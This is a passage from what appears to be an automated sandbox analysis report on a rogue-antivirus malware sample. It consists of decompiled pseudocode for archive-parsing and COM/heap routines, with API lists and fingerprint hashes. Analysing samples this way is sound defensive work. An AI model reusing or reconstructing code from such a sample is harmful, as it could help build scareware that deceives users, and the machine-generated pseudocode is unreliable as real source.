                                                                                                                                                      						_push( &_v532);
                                                                                                                                                      						_push(_t50); // executed
                                                                                                                                                      						if( *((intOrPtr*)( *_t50 + 0x18))() >= 0) {
                                                                                                                                                      							_t60 = 1;
                                                                                                                                                      						}
                                                                                                                                                      						_t52 = _v12;
                                                                                                                                                      						 *((intOrPtr*)( *_t52 + 8))(_t52);
                                                                                                                                                      					}
                                                                                                                                                      					_t46 = _v8;
                                                                                                                                                      					 *((intOrPtr*)( *_t46 + 8))(_t46);
                                                                                                                                                      				}
                                                                                                                                                      				"0+&u@uxv"();
                                                                                                                                                      				return _t60;
                                                                                                                                                      			}


















                                                                                                                                                      0x0040a9c7
                                                                                                                                                      0x0040a9ca
                                                                                                                                                      0x0040a9d0
                                                                                                                                                      0x0040a9e1
                                                                                                                                                      0x0040a9e9
                                                                                                                                                      0x0040a9ef
                                                                                                                                                      0x0040a9f8
                                                                                                                                                      0x0040a9fb
                                                                                                                                                      0x0040aa04
                                                                                                                                                      0x0040aa0a
                                                                                                                                                      0x0040aa0c
                                                                                                                                                      0x0040aa16
                                                                                                                                                      0x0040aa16
                                                                                                                                                      0x0040aa1c
                                                                                                                                                      0x0040aa1e
                                                                                                                                                      0x0040aa27
                                                                                                                                                      0x0040aa27
                                                                                                                                                      0x0040aa34
                                                                                                                                                      0x0040aa40
                                                                                                                                                      0x0040aa4b
                                                                                                                                                      0x0040aa4d
                                                                                                                                                      0x0040aa5a
                                                                                                                                                      0x0040aa5a
                                                                                                                                                      0x0040aa5d
                                                                                                                                                      0x0040aa65
                                                                                                                                                      0x0040aa66
                                                                                                                                                      0x0040aa6b
                                                                                                                                                      0x0040aa70
                                                                                                                                                      0x0040aa85
                                                                                                                                                      0x0040aa8b
                                                                                                                                                      0x0040aa90
                                                                                                                                                      0x0040aa98
                                                                                                                                                      0x0040aa99
                                                                                                                                                      0x0040aa9f
                                                                                                                                                      0x0040aaa1
                                                                                                                                                      0x0040aaa1
                                                                                                                                                      0x0040aaa3
                                                                                                                                                      0x0040aaa9
                                                                                                                                                      0x0040aaa9
                                                                                                                                                      0x0040aaac
                                                                                                                                                      0x0040aab2
                                                                                                                                                      0x0040aab2
                                                                                                                                                      0x0040aab5
                                                                                                                                                      0x0040aabf

                                                                                                                                                      APIs
                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 0040A9CA
                                                                                                                                                      • CoCreateInstance.OLE32(004128CC,00000000,00000001,0041281C,?), ref: 0040A9E1
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 0040AA85
                                                                                                                                                      • OleUninitialize.OLE32 ref: 0040AAB5
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharCreateInitializeInstanceMultiUninitializeWide
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2968213145-0
                                                                                                                                                      • Opcode ID: 5959a21a4365000ac8d7732775093f3948591aca15d2945793f0ef5b4e0237ea
                                                                                                                                                      • Instruction ID: 6b7c248a20d7c3edf2c5fae1c052d584914ffab3addb81b43edd9a7ac8a902f0
                                                                                                                                                      • Opcode Fuzzy Hash: 5959a21a4365000ac8d7732775093f3948591aca15d2945793f0ef5b4e0237ea
                                                                                                                                                      • Instruction Fuzzy Hash: 9C31C775A00209AFDF00DFA0C988E9A7B79AF48304F1444A9F515EB291C775DE61DF64
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040A1EC(long _a4) {
                                                                                                                                                      				void* _t3;
                                                                                                                                                      
                                                                                                                                                      				_t3 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
                                                                                                                                                      				return _t3;
                                                                                                                                                      			}




                                                                                                                                                      0x0040a1fb
                                                                                                                                                      0x0040a202

                                                                                                                                                      APIs
                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,?,0040A673,?,?,00402BD9), ref: 0040A1F4
                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,0040A673,?,?,00402BD9), ref: 0040A1FB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heap$AllocateProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1357844191-0
                                                                                                                                                      • Opcode ID: 74236f5c7da168fb3ace1d47c58c672c3213b8dd958d6a0e7c8abee1cd3c7f39
                                                                                                                                                      • Instruction ID: 7a16409088186048d9048875d39c01f0395119e9692a071e2e70866dbb263e04
                                                                                                                                                      • Opcode Fuzzy Hash: 74236f5c7da168fb3ace1d47c58c672c3213b8dd958d6a0e7c8abee1cd3c7f39
                                                                                                                                                      • Instruction Fuzzy Hash: 35C04C76044208A7C6105BD1AD09B857E1EE718651F008121F70585050C6B15120D66E
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                      			E00401357(void* __ecx, void* __edx, char _a4) {
                                                                                                                                                      				signed int _v8;
                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                      				intOrPtr _v20;
                                                                                                                                                      				signed int _v24;
                                                                                                                                                      				char _v36;
                                                                                                                                                      				void* _t87;
                                                                                                                                                      				signed int _t88;
                                                                                                                                                      				void* _t90;
                                                                                                                                                      				signed int _t93;
                                                                                                                                                      				signed int _t108;
                                                                                                                                                      				signed char _t115;
                                                                                                                                                      				signed int _t119;
                                                                                                                                                      				intOrPtr _t120;
                                                                                                                                                      				char _t129;
                                                                                                                                                      				signed int _t132;
                                                                                                                                                      				char* _t143;
                                                                                                                                                      				signed int _t144;
                                                                                                                                                      				char* _t151;
                                                                                                                                                      				void* _t156;
                                                                                                                                                      				intOrPtr _t157;
                                                                                                                                                      				signed int _t166;
                                                                                                                                                      				char _t167;
                                                                                                                                                      				signed int _t180;
                                                                                                                                                      				intOrPtr _t181;
                                                                                                                                                      				void* _t182;
                                                                                                                                                      
                                                                                                                                                      				_t178 = __edx;
                                                                                                                                                      				_t182 = __ecx;
                                                                                                                                                      				_t179 = __ecx + 0x4630;
                                                                                                                                                      				 *((char*)(__ecx + 0x6d90)) = 0;
                                                                                                                                                      				_t87 = E0040568A(__ecx, __edx, __ecx + 0x4630, 7); // executed
                                                                                                                                                      				if(_t87 != 7) {
                                                                                                                                                      					return 0;
                                                                                                                                                      				}
                                                                                                                                                      				_t160 = _t182;
                                                                                                                                                      				 *(_t182 + 0x6d94) = 0;
                                                                                                                                                      				_t88 = E0040122B(_t182, _t179);
                                                                                                                                                      				__eflags = _t88;
                                                                                                                                                      				if(_t88 == 0) {
                                                                                                                                                      					E00403952( &_v24, 0x80000);
                                                                                                                                                      					_t90 = E00404FDC(_t182, _t178); // executed
                                                                                                                                                      					_t156 = _t90;
                                                                                                                                                      					_t93 = E0040568A(_t182, _t178, _v24, _v20 + 0xfffffff0); // executed
                                                                                                                                                      					_t180 = 0;
                                                                                                                                                      					_v8 = _t93;
                                                                                                                                                      					__eflags = _t93;
                                                                                                                                                      					if(_t93 <= 0) {
                                                                                                                                                      						L20:
                                                                                                                                                      						__eflags =  *(_t182 + 0x6d94);
                                                                                                                                                      						if( *(_t182 + 0x6d94) != 0) {
                                                                                                                                                      							__eflags = _v24;
                                                                                                                                                      							if(__eflags != 0) {
                                                                                                                                                      								E0040A205(_v24); // executed
                                                                                                                                                      							}
                                                                                                                                                      							goto L25;
                                                                                                                                                      						}
                                                                                                                                                      						__eflags = _v24;
                                                                                                                                                      						if(_v24 != 0) {
                                                                                                                                                      							E0040A205(_v24);
                                                                                                                                                      						}
                                                                                                                                                      						goto L29;
                                                                                                                                                      					} else {
                                                                                                                                                      						goto L6;
                                                                                                                                                      					}
                                                                                                                                                      					do {
                                                                                                                                                      						L6:
                                                                                                                                                      						_t143 = _v24 + _t180;
                                                                                                                                                      						__eflags =  *_t143 - 0x52;
                                                                                                                                                      						if( *_t143 != 0x52) {
                                                                                                                                                      							goto L16;
                                                                                                                                                      						}
                                                                                                                                                      						_t176 = _t182;
                                                                                                                                                      						_t144 = E0040122B(_t182, _t143);
                                                                                                                                                      						__eflags = _t144;
                                                                                                                                                      						if(_t144 == 0) {
                                                                                                                                                      							goto L16;
                                                                                                                                                      						}
                                                                                                                                                      						__eflags =  *(_t182 + 0x6d88);
                                                                                                                                                      						if( *(_t182 + 0x6d88) == 0) {
                                                                                                                                                      							L18:
                                                                                                                                                      							 *(_t182 + 0x6d94) = _t180 + _t156;
                                                                                                                                                      							E004054ED(_t176, _t180 + _t156, 0, 0);
                                                                                                                                                      							__eflags =  *(_t182 + 0x6d88);
                                                                                                                                                      							if( *(_t182 + 0x6d88) == 0) {
                                                                                                                                                      								E0040568A(_t182, _t178, _t182 + 0x4630, 7);
                                                                                                                                                      							}
                                                                                                                                                      							goto L20;
                                                                                                                                                      						}
                                                                                                                                                      						__eflags = _t180;
                                                                                                                                                      						if(_t180 <= 0) {
                                                                                                                                                      							goto L18;
                                                                                                                                                      						}
                                                                                                                                                      						__eflags = _t156 - 0x1c;
                                                                                                                                                      						if(_t156 >= 0x1c) {
                                                                                                                                                      							goto L18;
                                                                                                                                                      						}
                                                                                                                                                      						__eflags = _v8 - 0x1f;
                                                                                                                                                      						if(_v8 <= 0x1f) {
                                                                                                                                                      							goto L18;
                                                                                                                                                      						}
                                                                                                                                                      						_t151 = _v24 - _t156 + 0x1c;
                                                                                                                                                      						__eflags =  *_t151 - 0x52;
                                                                                                                                                      						if( *_t151 != 0x52) {
                                                                                                                                                      							goto L16;
                                                                                                                                                      						}
                                                                                                                                                      						__eflags =  *((char*)(_t151 + 1)) - 0x53;
                                                                                                                                                      						if( *((char*)(_t151 + 1)) != 0x53) {
                                                                                                                                                      							goto L16;
                                                                                                                                                      						}
                                                                                                                                                      						__eflags =  *((char*)(_t151 + 2)) - 0x46;
                                                                                                                                                      						if( *((char*)(_t151 + 2)) != 0x46) {
                                                                                                                                                      							goto L16;
                                                                                                                                                      						}
                                                                                                                                                      						__eflags =  *((char*)(_t151 + 3)) - 0x58;
                                                                                                                                                      						if( *((char*)(_t151 + 3)) == 0x58) {
                                                                                                                                                      							goto L18;
                                                                                                                                                      						}
                                                                                                                                                      						L16:
                                                                                                                                                      						_t180 = _t180 + 1;
                                                                                                                                                      						__eflags = _t180 - _v8;
                                                                                                                                                      					} while (_t180 < _v8);
                                                                                                                                                      					goto L20;
                                                                                                                                                      				} else {
                                                                                                                                                      					__eflags =  *(_t182 + 0x6d88);
                                                                                                                                                      					if(__eflags != 0) {
                                                                                                                                                      						E004054ED(_t160, 0, 0, 0);
                                                                                                                                                      					}
                                                                                                                                                      					L25:
                                                                                                                                                      					E00401CE5(_t182, _t178, __eflags); // executed
                                                                                                                                                      					E00401264(_t182);
                                                                                                                                                      					__eflags =  *((intOrPtr*)(_t182 + 0x6d9a)) -  *((intOrPtr*)(_t182 + 0x468c));
                                                                                                                                                      					if( *((intOrPtr*)(_t182 + 0x6d9a)) ==  *((intOrPtr*)(_t182 + 0x468c))) {
                                                                                                                                                      						L27:
                                                                                                                                                      						_t166 =  *(_t182 + 0x4694) & 0x0000ffff;
                                                                                                                                                      						 *(_t182 + 0x6d8a) =  *(_t182 + 0x4694) & 0x00000001;
                                                                                                                                                      						 *(_t182 + 0x6d89) = _t166 >> 0x00000003 & 0x00000001;
                                                                                                                                                      						 *(_t182 + 0x6d8b) = _t166 >> 0x00000001 & 0x00000001;
                                                                                                                                                      						_t108 = _t166 >> 0x00000002 & 0x00000001;
                                                                                                                                                      						__eflags =  *(_t182 + 0x469c);
                                                                                                                                                      						 *(_t182 + 0x6d8c) = _t108;
                                                                                                                                                      						 *((char*)(_t182 + 0x6d8d)) = _t108 & 0xffffff00 |  *(_t182 + 0x469c) != 0x00000000;
                                                                                                                                                      						 *(_t182 + 0x6d8f) = _t166 >> 0x00000006 & 0x00000001;
                                                                                                                                                      						_t115 = _t166 >> 0x00000007 & 0x00000001;
                                                                                                                                                      						__eflags =  *((char*)(_t182 + 0x46a0)) - 0x24;
                                                                                                                                                      						 *(_t182 + 0x6d90) = _t115;
                                                                                                                                                      						if( *((char*)(_t182 + 0x46a0)) <= 0x24) {
                                                                                                                                                      							__eflags = _t115;
                                                                                                                                                      							if(_t115 == 0) {
                                                                                                                                                      								L33:
                                                                                                                                                      								_t167 = 0;
                                                                                                                                                      								__eflags = 0;
                                                                                                                                                      								L34:
                                                                                                                                                      								__eflags =  *((char*)(_t182 + 0x467c));
                                                                                                                                                      								 *((char*)(_t182 + 0x6d8e)) = _t167;
                                                                                                                                                      								if(__eflags == 0) {
                                                                                                                                                      									L36:
                                                                                                                                                      									E0040A7E9( &_v36, _t178, _t182);
                                                                                                                                                      									_t181 =  *((intOrPtr*)(_t182 + 0x6d78));
                                                                                                                                                      									_t157 =  *((intOrPtr*)(_t182 + 0x6d7c));
                                                                                                                                                      									_v12 =  *((intOrPtr*)(_t182 + 0x6d80));
                                                                                                                                                      									_v8 =  *(_t182 + 0x6d84);
                                                                                                                                                      									 *((char*)(_t182 + 0x6d8e)) = 0;
                                                                                                                                                      									while(1) {
                                                                                                                                                      										_t119 = E00401CE5(_t182, _t178, __eflags); // executed
                                                                                                                                                      										__eflags = _t119;
                                                                                                                                                      										if(_t119 == 0) {
                                                                                                                                                      											break;
                                                                                                                                                      										}
                                                                                                                                                      										_t120 =  *((intOrPtr*)(_t182 + 0x4678));
                                                                                                                                                      										__eflags = _t120 - 0x7a;
                                                                                                                                                      										if(_t120 != 0x7a) {
                                                                                                                                                      											__eflags = _t120 - 0x74;
                                                                                                                                                      											if(_t120 != 0x74) {
                                                                                                                                                      												L53:
                                                                                                                                                      												 *((intOrPtr*)(_t182 + 0x6d80)) = _v12;
                                                                                                                                                      												 *((intOrPtr*)(_t182 + 0x6d78)) = _t181;
                                                                                                                                                      												 *((intOrPtr*)(_t182 + 0x6d7c)) = _t157;
                                                                                                                                                      												 *(_t182 + 0x6d84) = _v8;
                                                                                                                                                      												E0040A810( &_v36);
                                                                                                                                                      												L54:
                                                                                                                                                      												__eflags =  *(_t182 + 0x6d8a);
                                                                                                                                                      												if( *(_t182 + 0x6d8a) == 0) {
                                                                                                                                                      													L56:
                                                                                                                                                      													E0040A477(_t182 + 0x6db5, _t182 + 0x17);
                                                                                                                                                      													__eflags = _t182 + 0x71b6;
                                                                                                                                                      													E0040E338(_t182 + 0x71b6, _t182 + 0x418);
                                                                                                                                                      													L57:
                                                                                                                                                      													_t129 = 1;
                                                                                                                                                      													L58:
                                                                                                                                                      													return _t129;
                                                                                                                                                      												}
                                                                                                                                                      												__eflags =  *((char*)(_t182 + 0x6d8e));
                                                                                                                                                      												if( *((char*)(_t182 + 0x6d8e)) != 0) {
                                                                                                                                                      													goto L57;
                                                                                                                                                      												}
                                                                                                                                                      												goto L56;
                                                                                                                                                      											}
                                                                                                                                                      											__eflags =  *(_t182 + 0x46b0) & 0x00000001;
                                                                                                                                                      											if(( *(_t182 + 0x46b0) & 0x00000001) != 0) {
                                                                                                                                                      												L52:
                                                                                                                                                      												 *((char*)(_t182 + 0x6d8e)) = 1;
                                                                                                                                                      												goto L53;
                                                                                                                                                      											}
                                                                                                                                                      											__eflags =  *(_t182 + 0x6d8a);
                                                                                                                                                      											if( *(_t182 + 0x6d8a) == 0) {
                                                                                                                                                      												goto L53;
                                                                                                                                                      											}
                                                                                                                                                      											__eflags =  *((char*)(_t182 + 0x46c8)) - 0x1d;
                                                                                                                                                      											if( *((char*)(_t182 + 0x46c8)) < 0x1d) {
                                                                                                                                                      												goto L53;
                                                                                                                                                      											}
                                                                                                                                                      											__eflags =  *(_t182 + 0x4694) & 0x00000100;
                                                                                                                                                      											if(( *(_t182 + 0x4694) & 0x00000100) != 0) {
                                                                                                                                                      												goto L53;
                                                                                                                                                      											}
                                                                                                                                                      											goto L52;
                                                                                                                                                      										}
                                                                                                                                                      										_t132 = E0040A4E9(_t182 + 0x53e8, "CMT");
                                                                                                                                                      										__eflags = _t132;
                                                                                                                                                      										if(_t132 == 0) {
                                                                                                                                                      											 *(_t182 + 0x6d8b) = 1;
                                                                                                                                                      										}
                                                                                                                                                      										__eflags =  *(_t182 + 0x53c0) & 0x00000001;
                                                                                                                                                      										if(__eflags != 0) {
                                                                                                                                                      											L43:
                                                                                                                                                      											 *((char*)(_t182 + 0x6d8e)) = 1;
                                                                                                                                                      											goto L44;
                                                                                                                                                      										} else {
                                                                                                                                                      											__eflags =  *(_t182 + 0x6d8a);
                                                                                                                                                      											if(__eflags == 0) {
                                                                                                                                                      												L44:
                                                                                                                                                      												E00401264(_t182);
                                                                                                                                                      												continue;
                                                                                                                                                      											}
                                                                                                                                                      											__eflags =  *(_t182 + 0x4694) & 0x00000100;
                                                                                                                                                      											if(__eflags != 0) {
                                                                                                                                                      												goto L44;
                                                                                                                                                      											}
                                                                                                                                                      											goto L43;
                                                                                                                                                      										}
                                                                                                                                                      									}
                                                                                                                                                      									goto L53;
                                                                                                                                                      								}
                                                                                                                                                      								__eflags = _t115;
                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                      									goto L54;
                                                                                                                                                      								}
                                                                                                                                                      								goto L36;
                                                                                                                                                      							}
                                                                                                                                                      							__eflags = _t166 & 0x00000100;
                                                                                                                                                      							if((_t166 & 0x00000100) != 0) {
                                                                                                                                                      								goto L33;
                                                                                                                                                      							}
                                                                                                                                                      							_t167 = 1;
                                                                                                                                                      							goto L34;
                                                                                                                                                      						}
                                                                                                                                                      						E0040325C(0x414c7c, 1);
                                                                                                                                                      						L29:
                                                                                                                                                      						_t129 = 0;
                                                                                                                                                      						goto L58;
                                                                                                                                                      					}
                                                                                                                                                      					_push(E004098F7(0x7c));
                                                                                                                                                      					_push(_t182 + 0x17);
                                                                                                                                                      					E00402C95(E0040B2A9());
                                                                                                                                                      					__eflags = _a4;
                                                                                                                                                      					if(_a4 == 0) {
                                                                                                                                                      						goto L29;
                                                                                                                                                      					}
                                                                                                                                                      					goto L27;
                                                                                                                                                      				}
                                                                                                                                                      			}




























                                                                                                                                                      0x00401357
                                                                                                                                                      0x0040135f
                                                                                                                                                      0x00401363
                                                                                                                                                      0x0040136a
                                                                                                                                                      0x00401371
                                                                                                                                                      0x00401379
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040137b
                                                                                                                                                      0x00401386
                                                                                                                                                      0x00401388
                                                                                                                                                      0x0040138e
                                                                                                                                                      0x00401393
                                                                                                                                                      0x00401395
                                                                                                                                                      0x004013b8
                                                                                                                                                      0x004013bf
                                                                                                                                                      0x004013c4
                                                                                                                                                      0x004013d2
                                                                                                                                                      0x004013d7
                                                                                                                                                      0x004013d9
                                                                                                                                                      0x004013dc
                                                                                                                                                      0x004013de
                                                                                                                                                      0x00401465
                                                                                                                                                      0x00401467
                                                                                                                                                      0x0040146d
                                                                                                                                                      0x00401485
                                                                                                                                                      0x00401488
                                                                                                                                                      0x0040148d
                                                                                                                                                      0x0040148d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401488
                                                                                                                                                      0x0040146f
                                                                                                                                                      0x00401472
                                                                                                                                                      0x0040147b
                                                                                                                                                      0x0040147b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004013e4
                                                                                                                                                      0x004013e4
                                                                                                                                                      0x004013e7
                                                                                                                                                      0x004013e9
                                                                                                                                                      0x004013ec
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004013ef
                                                                                                                                                      0x004013f1
                                                                                                                                                      0x004013f6
                                                                                                                                                      0x004013f8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004013fa
                                                                                                                                                      0x00401401
                                                                                                                                                      0x00401439
                                                                                                                                                      0x00401441
                                                                                                                                                      0x00401447
                                                                                                                                                      0x0040144c
                                                                                                                                                      0x00401453
                                                                                                                                                      0x00401460
                                                                                                                                                      0x00401460
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401453
                                                                                                                                                      0x00401403
                                                                                                                                                      0x00401405
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401407
                                                                                                                                                      0x0040140a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040140c
                                                                                                                                                      0x00401410
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401417
                                                                                                                                                      0x0040141a
                                                                                                                                                      0x0040141d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040141f
                                                                                                                                                      0x00401423
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401425
                                                                                                                                                      0x00401429
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040142b
                                                                                                                                                      0x0040142f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401431
                                                                                                                                                      0x00401431
                                                                                                                                                      0x00401432
                                                                                                                                                      0x00401432
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401397
                                                                                                                                                      0x00401397
                                                                                                                                                      0x0040139d
                                                                                                                                                      0x004013a6
                                                                                                                                                      0x004013a6
                                                                                                                                                      0x00401492
                                                                                                                                                      0x00401494
                                                                                                                                                      0x0040149b
                                                                                                                                                      0x004014a7
                                                                                                                                                      0x004014ae
                                                                                                                                                      0x004014ce
                                                                                                                                                      0x004014ce
                                                                                                                                                      0x004014dd
                                                                                                                                                      0x004014ea
                                                                                                                                                      0x004014f6
                                                                                                                                                      0x00401501
                                                                                                                                                      0x00401503
                                                                                                                                                      0x0040150a
                                                                                                                                                      0x00401513
                                                                                                                                                      0x00401520
                                                                                                                                                      0x0040152b
                                                                                                                                                      0x0040152d
                                                                                                                                                      0x00401534
                                                                                                                                                      0x0040153a
                                                                                                                                                      0x0040154f
                                                                                                                                                      0x00401551
                                                                                                                                                      0x00401560
                                                                                                                                                      0x00401560
                                                                                                                                                      0x00401560
                                                                                                                                                      0x00401562
                                                                                                                                                      0x00401562
                                                                                                                                                      0x00401569
                                                                                                                                                      0x0040156f
                                                                                                                                                      0x00401579
                                                                                                                                                      0x0040157d
                                                                                                                                                      0x00401588
                                                                                                                                                      0x0040158e
                                                                                                                                                      0x00401594
                                                                                                                                                      0x0040159d
                                                                                                                                                      0x004015a0
                                                                                                                                                      0x004015fe
                                                                                                                                                      0x00401600
                                                                                                                                                      0x00401605
                                                                                                                                                      0x00401607
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004015a9
                                                                                                                                                      0x004015af
                                                                                                                                                      0x004015b2
                                                                                                                                                      0x0040160b
                                                                                                                                                      0x0040160e
                                                                                                                                                      0x00401640
                                                                                                                                                      0x00401643
                                                                                                                                                      0x0040164f
                                                                                                                                                      0x00401655
                                                                                                                                                      0x0040165b
                                                                                                                                                      0x00401661
                                                                                                                                                      0x00401666
                                                                                                                                                      0x00401666
                                                                                                                                                      0x0040166d
                                                                                                                                                      0x00401678
                                                                                                                                                      0x00401683
                                                                                                                                                      0x0040168f
                                                                                                                                                      0x00401696
                                                                                                                                                      0x0040169b
                                                                                                                                                      0x0040169b
                                                                                                                                                      0x0040169d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040169d
                                                                                                                                                      0x0040166f
                                                                                                                                                      0x00401676
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401676
                                                                                                                                                      0x00401610
                                                                                                                                                      0x00401617
                                                                                                                                                      0x00401639
                                                                                                                                                      0x00401639
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401639
                                                                                                                                                      0x00401619
                                                                                                                                                      0x00401620
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401622
                                                                                                                                                      0x00401629
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401630
                                                                                                                                                      0x00401637
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401637
                                                                                                                                                      0x004015c0
                                                                                                                                                      0x004015c5
                                                                                                                                                      0x004015c7
                                                                                                                                                      0x004015c9
                                                                                                                                                      0x004015c9
                                                                                                                                                      0x004015d0
                                                                                                                                                      0x004015d7
                                                                                                                                                      0x004015f0
                                                                                                                                                      0x004015f0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004015d9
                                                                                                                                                      0x004015d9
                                                                                                                                                      0x004015e0
                                                                                                                                                      0x004015f7
                                                                                                                                                      0x004015f9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004015f9
                                                                                                                                                      0x004015e7
                                                                                                                                                      0x004015ee
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004015ee
                                                                                                                                                      0x004015d7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401609
                                                                                                                                                      0x00401571
                                                                                                                                                      0x00401573
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401573
                                                                                                                                                      0x00401553
                                                                                                                                                      0x00401559
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040155d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040155d
                                                                                                                                                      0x00401543
                                                                                                                                                      0x00401548
                                                                                                                                                      0x00401548
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401548
                                                                                                                                                      0x004014b7
                                                                                                                                                      0x004014bb
                                                                                                                                                      0x004014c3
                                                                                                                                                      0x004014c8
                                                                                                                                                      0x004014cc
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004014cc

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: CMT$|LA
                                                                                                                                                      • API String ID: 0-3111524465
                                                                                                                                                      • Opcode ID: c155400c815564dadfbf603a83f8382b3448e47e6a2f946495a97fe2ddafdf87
                                                                                                                                                      • Instruction ID: 3467558b02b3088dee00dca3edea15e6df14af65674381350c28196c55da78c7
                                                                                                                                                      • Opcode Fuzzy Hash: c155400c815564dadfbf603a83f8382b3448e47e6a2f946495a97fe2ddafdf87
                                                                                                                                                      • Instruction Fuzzy Hash: BC913870A047409EEB21DB7488057EBB7E59F11308F04087FD49AB72E2DB7E6945DB2A
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                                      			E00410D74(intOrPtr* __ecx, signed int _a4, char _a7) {
                                                                                                                                                      				signed int _v8;
